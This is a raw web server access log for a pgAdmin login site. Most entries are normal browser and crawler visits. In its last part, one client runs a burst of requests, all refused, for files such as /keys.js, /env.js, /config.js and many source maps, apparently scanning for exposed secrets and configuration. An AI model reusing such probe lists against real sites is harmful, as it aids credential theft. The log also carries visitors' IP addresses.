3738] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/login?next=/" +[20/Jan/2026:06:55:39 +0000] - 200 200 - GET https db.profibot.hu "/tools/translations.js?ver=91100" [Client 84.1.26.27] [Length 321] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/login?next=/" +[20/Jan/2026:06:55:40 +0000] - 302 302 - GET https db.profibot.hu "/favicon.ico?ver=91100" [Client 84.1.26.27] [Length 245] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/login?next=/" +[20/Jan/2026:06:55:40 +0000] - 200 200 - GET https db.profibot.hu "/static/favicon.ico?ver=91100" [Client 84.1.26.27] [Length 78998] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/login?next=/" +[20/Jan/2026:07:16:11 +0000] - 302 302 - GET https db.profibot.hu "/" [Client 37.76.15.34] [Length 213] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[20/Jan/2026:07:16:12 +0000] - 200 200 - GET https db.profibot.hu "/login?next=/" [Client 37.76.15.34] [Length 2495] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[20/Jan/2026:07:16:12 +0000] - 200 200 - GET https db.profibot.hu "/tools/translations.js?ver=91100" [Client 37.76.15.34] [Length 321] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://db.profibot.hu/login?next=/" +[20/Jan/2026:07:16:12 +0000] - 200 200 - GET https db.profibot.hu "/browser/js/endpoints.js?ver=91100" [Client 37.76.15.34] [Length 3738] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://db.profibot.hu/login?next=/" +[20/Jan/2026:11:30:56 +0000] - 404 404 - GET https db.profibot.hu "/robots.txt" [Client 74.7.175.159] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot" "-" +[20/Jan/2026:11:30:57 +0000] - 302 302 - GET https db.profibot.hu "/" [Client 74.7.241.49] [Length 213] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "-" +[20/Jan/2026:11:30:57 +0000] - 200 200 - GET https db.profibot.hu "/login?next=/" [Client 74.7.241.49] [Length 2309] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://db.profibot.hu/" +[20/Jan/2026:15:27:59 +0000] - 302 302 - GET https db.profibot.hu "/" [Client 31.46.76.56] [Length 213] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36 Edg/144.0.0.0" "-" +[20/Jan/2026:15:27:59 +0000] - 200 200 - GET https db.profibot.hu "/login?next=/" [Client 31.46.76.56] [Length 2494] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36 Edg/144.0.0.0" "-" +[20/Jan/2026:15:27:59 +0000] - 200 200 - GET https db.profibot.hu "/static/js/generated/style.css?ver=91100" [Client 31.46.76.56] [Length 91437] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36 Edg/144.0.0.0" "https://db.profibot.hu/login?next=/" +[20/Jan/2026:15:27:59 +0000] - 200 200 - GET https db.profibot.hu "/static/vendor/require/require.min.js?ver=91100" [Client 31.46.76.56] [Length 7187] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36 Edg/144.0.0.0" "https://db.profibot.hu/login?next=/" +[20/Jan/2026:15:27:59 +0000] - 200 200 - GET https db.profibot.hu "/static/js/generated/pgadmin_commons.js?ver=91100" [Client 31.46.76.56] [Length 5996] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36 Edg/144.0.0.0" "https://db.profibot.hu/login?next=/" +[20/Jan/2026:15:27:59 +0000] - 200 200 - GET https db.profibot.hu "/static/js/generated/vendor.react.js?ver=91100" [Client 31.46.76.56] [Length 153691] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36 Edg/144.0.0.0" "https://db.profibot.hu/login?next=/" +[20/Jan/2026:15:27:59 +0000] - 200 200 - GET https db.profibot.hu "/static/js/generated/vendor.sqleditor.js?ver=91100" [Client 31.46.76.56] [Length 172313] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36 Edg/144.0.0.0" "https://db.profibot.hu/login?next=/" +[20/Jan/2026:15:27:59 +0000] - 200 200 - GET https db.profibot.hu "/static/js/generated/vendor.main.js?ver=91100" [Client 31.46.76.56] [Length 323675] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36 Edg/144.0.0.0" "https://db.profibot.hu/login?next=/" +[20/Jan/2026:15:28:00 +0000] - 200 200 - GET https db.profibot.hu "/static/js/generated/vendor.others.js?ver=91100" [Client 31.46.76.56] [Length 2351296] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36 Edg/144.0.0.0" "https://db.profibot.hu/login?next=/" +[20/Jan/2026:15:28:00 +0000] - 302 302 - GET https db.profibot.hu "/favicon.ico?ver=91100" [Client 31.46.76.56] [Length 245] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36 Edg/144.0.0.0" "https://db.profibot.hu/login?next=/" +[20/Jan/2026:15:28:00 +0000] - 200 200 - GET https db.profibot.hu "/static/js/generated/security.pages.js?ver=91100" [Client 31.46.76.56] [Length 134798] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36 Edg/144.0.0.0" "https://db.profibot.hu/login?next=/" +[20/Jan/2026:15:28:00 +0000] - 200 200 - GET https db.profibot.hu "/static/favicon.ico?ver=91100" [Client 31.46.76.56] [Length 78998] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36 Edg/144.0.0.0" "https://db.profibot.hu/login?next=/" +[20/Jan/2026:15:28:00 +0000] - 200 200 - GET https db.profibot.hu "/browser/js/endpoints.js?ver=91100" [Client 31.46.76.56] [Length 3738] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36 Edg/144.0.0.0" "https://db.profibot.hu/login?next=/" +[20/Jan/2026:15:28:00 +0000] - 200 200 - GET https db.profibot.hu "/tools/translations.js?ver=91100" [Client 31.46.76.56] [Length 321] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36 Edg/144.0.0.0" "https://db.profibot.hu/login?next=/" +[20/Jan/2026:15:28:00 +0000] - 200 200 - GET https db.profibot.hu "/static/js/generated/fonts/Roboto-Regular..ttf" [Client 31.46.76.56] [Length 171676] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36 Edg/144.0.0.0" "https://db.profibot.hu/static/js/generated/style.css?ver=91100" +[20/Jan/2026:16:03:53 +0000] - - 301 - GET http db.profibot.hu "/" [Client 34.148.119.238] [Length 166] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (compatible; CMS-Checker/1.0; +https://example.com)" "-" +[20/Jan/2026:16:03:53 +0000] - 302 302 - GET https db.profibot.hu "/" [Client 34.148.119.238] [Length 213] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (compatible; CMS-Checker/1.0; +https://example.com)" "http://db.profibot.hu" +[20/Jan/2026:16:03:53 +0000] - 200 200 - GET https db.profibot.hu "/login?next=/" [Client 34.148.119.238] [Length 2391] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (compatible; CMS-Checker/1.0; +https://example.com)" "https://db.profibot.hu/" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/build/static/js/main.js" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/api.js" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/vendor.js" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/keys.js" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/_next/static/chunks/polyfills.js" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/src/env.d.ts" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/checkout.js" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/config.js" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/_next/static/chunks/framework.js" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/_astro/client.js" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/.astro/types.d.ts" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/settings.json" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/remix.config.js" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/.svelte-kit/output/client/_app/env.js" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/vite.config.js" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/_next/static/chunks/_buildManifest.js" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/_next/static/chunks/0.js" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/_astro/page.js" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/_nuxt/config.js" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/index.js.map" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/assets/index.js" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/_app/immutable/chunks/index.js" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/assets/main.js.map" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/public/page-data/app-data.json" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/static/js/3.chunk.js" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/serviceworker.js" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/env.js" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/src/env.js" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/build/bundle.js.map" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/src/constants.js" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/donate" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/_nuxt/vendors.app.js" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/.cache/page-ssr/routes/render-page.js" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/asset-manifest.json" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/runtime-config.js" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/__env.js" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/runtime~main.js" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/dist/main.js.map" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/sw.js" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/chunk.js.map" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/static/js/4.chunk.js" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/webpack-runtime.js" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/.vite/manifest.json" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/main.js" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/api/config" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/dist/app.js" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/src/env.d.ts" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/_nuxt/app.js.map" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/build/main.js.map" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/assets/index.js.map" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/window.env.js" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/public/build/root.js" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/bundle.js.map" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/config/env.js" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/bundle.js" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/static/js/main.js.map" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/assets/js/main.js" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/_next/static/chunks/main.js" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/_next/static/chunks/webpack.js" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/_app/immutable/chunks/singletons.js" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/env-config.js" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/_next/static/chunks/webpack.js.map" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/build/app.js" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/constants.js" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/_next/static/chunks/2.js" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/js/app.js" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/app.js" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/settings.js" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/runtime.js.map" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/build/asset-manifest.json" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:48 +0000] - 404 404 - GET https db.profibot.hu "/static/js/main.js" [Client 216.81.245.209] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] 